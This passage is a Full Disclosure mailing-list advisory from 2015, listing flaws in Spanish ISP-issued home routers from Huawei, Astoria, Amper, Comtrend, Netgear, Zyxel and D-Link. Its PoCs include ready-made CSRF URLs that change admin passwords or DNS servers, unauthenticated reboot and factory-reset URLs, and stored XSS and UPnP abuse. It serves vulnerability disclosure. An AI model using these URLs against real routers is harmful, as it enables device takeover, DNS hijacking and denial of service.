permanent denial of service attack on.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC:
Without requiring any login process, an attacker is able to bring on a
permanent denial of
service by constantly accessing the /rebootinfo.cgi URL.
The attacker is also able to force the router to reset to default
configuration settings by
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log
into the router
by using the default credentials.
In both attacks, router replies with HTTP 400 status code, but either the
reboot or the
configuration reset is being correctly executed.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory
allows script code
injection.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
I.e., if an attacker wants to change the administrator password, he may use
the following
URL to do so once the victim opens the link:
http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG556a
Tested firmwares: V100R001C10B077
Comments: Common router that ISP Vodafone used to give away to their
customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication
----------------------------
* Description: An external attacker, without requiring any login process,
is able
to view, modify, delete and upload new files to the USB storage
device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is
able to
download, modify the content and upload new files, without requiring any
login process.
In order to do so, the attacker only needs to access the router IP followed
by the 9000 port.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication
----------------------------------
* Description: An external attacker, without requiring any login process,
is able
to reset the router settings to default ones besides bringing a
permanent denial of service attack on.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC:
Without requiring any login process, an attacker is able to bring on a
permanent denial of
service by constantly accessing the /rebootinfo.cgi URL.
The attacker is also able to force the router to reset to default
configuration settings by
accessing the /restoreinfo.cgi URL. After that, the attacker is able to log
into the router
by using the default credentials.
In both attacks, router asks for username-password and returns HTTP 401
status code
(unauthorized), but after multiple requests are sent, it replies with HTTP
400 status code
and executes the action.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
I.e., if an attacker wants to change the administrator password, he may use
the following
URL to do so once the victim opens the link:
http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory
allows script code
injection.
The script execution can be clearly seen within different subdirectories
such as
diagnostic.htm and config_wifi.htm.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121777 (http://osvdb.org/show/osvdb/121777)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored within the Dispositivos Conectados
(Connected Devices)
table.
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Astoria
Model: ARV7510
Tested firmwares: 00.03.41
Comments: Common router that ISP Vodafone used to give away to their
customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication
----------------------------
* Description: An external attacker, without requiring any login process,
is able
to view, modify, delete and upload new files to the USB storage
device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121773 (http://osvdb.org/show/osvdb/121773)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is
able to
download, modify the content and upload new files, without requiring any
login process.
In order to do so, the attacker only needs to access the router IP followed
by the 9000 port.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and
OSVDB-121888 (http://osvdb.org/show/osvdb/121888)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
I.e., if an attacker wants to change the administrator password, he may use
the following
URL to do so once the victim opens the link:
http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1
============================================================================================
============================================================================================
Manufacturer: Amper
Model: ASL-26555
Tested firmwares: v2.0.0.37B_ES
Comments: Common router that Spanish ISP Telefónica used to give away to
their
customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and
OSVDB-121771 (http://osvdb.org/show/osvdb/121771)
* PoC:
Besides the main web configuration interface (port 80), there is a much
more advanced one
on port 8000 in which every input field is vulnerable to CSRF.
I.e., if an attacker wants to change the DNS servers, he may use the
following URL to do
so once the victim opens the link:
http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?
&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS
It is also possible for an attacker to change the default router
administrator password by
sending the victim this URL: (URL is omitted due to size reasons)
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121772 (http://osvdb.org/show/osvdb/121772)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Red Inalambrica->Nombre (Wireless
Network->Name)
subdirectory allows script code injection. The vulnerable input field is
found into the
basic web interface on port 80.
The script execution can be clearly seen within the Advanced->WLAN Access
Rules subdirectory,
into the advanced web interface on port 8000.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored within the Connected Clients table
(Setup->Local Network).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: AR-5387un
Tested firmwares: A731-410JAZ-C04_R02
Comments: Common router that ISP Jazztel used to give away to their
customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Wireless->Basic subdirectory allows script
code injection.
The script execution can be clearly seen within Wireless->Security and
Wireless->MAC Filter
subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored within the DHCP Leases table (Device Info
-> DHCP).
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Netgear
Model: CG3100D
Tested firmwares: v1.05.05
Comments: Common router that ISP ONO used to give away to their customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121795 (http://osvdb.org/show/osvdb/121795)
* PoC:
Every input field is vulnerable to CSRF.
An attacker may code a malicious website which triggers a POST request to
the victim’s
router. When a website with that code is accessed, the POST request is sent
and the attack
is done.
It is also possible for an attacker to reset the victim’s router to default
settings by
using custom source code.
(Source codes have been omitted due to size reasons).
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121780 (http://osvdb.org/show/osvdb/121780)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Red Inalambrica->Nombre (Wireless
Network->Name)
subdirectory allows script code injection.
The script execution can be clearly seen within different subdirectories
such as
Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and
Avanzado->Estado del
router (Advanced->Router status).
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: VG-8050
Tested firmwares: SB01-S412TLF-C07_R03
Comments: Common router that Spanish ISP Telefonica used to give away to
their
customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Wireless->Basic subdirectory allows script
code injection.
The script execution can be clearly seen within Wireless->Security and
Wireless->MAC Filter
subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored within the DHCP Leases table (Device Info
-> DHCP).
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Zyxel
Model: P 660HW-B1A
Tested firmwares: 3.10L.02
Comments: Common router that Spanish ISP Telefonica used to give away to
their
customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121796 (http://osvdb.org/show/osvdb/121796)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the Hostname field within the Dynamic DNS subdirectory allows script
code
injection.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121797 (http://osvdb.org/show/osvdb/121797)
* PoC:
Every input field is vulnerable to Cross Site Request Forgery attacks.
I.e., if an attacker wants to change the administrator password, he may use
the following
URL to do so once the victim opens the link:
http://192.168.1.1/password.cgi?sysPassword=newpassword
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: 536+
Tested firmwares: A101-220TLF-C35
Comments: Common router that Spanish ISP Telefonica used to give away to
their
customers
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: D-Link
Model: DIR-600
Tested firmwares: PV6K3A8024009
Comments:
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
We would also like to thank Alejandro Ramos (Project Tutor) and Maite
Villalba (Director of Master).
Greetings,
Jose Antonio Rodriguez Garcia
Alvaro Folgado Rueda
Ivan Sanz de Castro.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists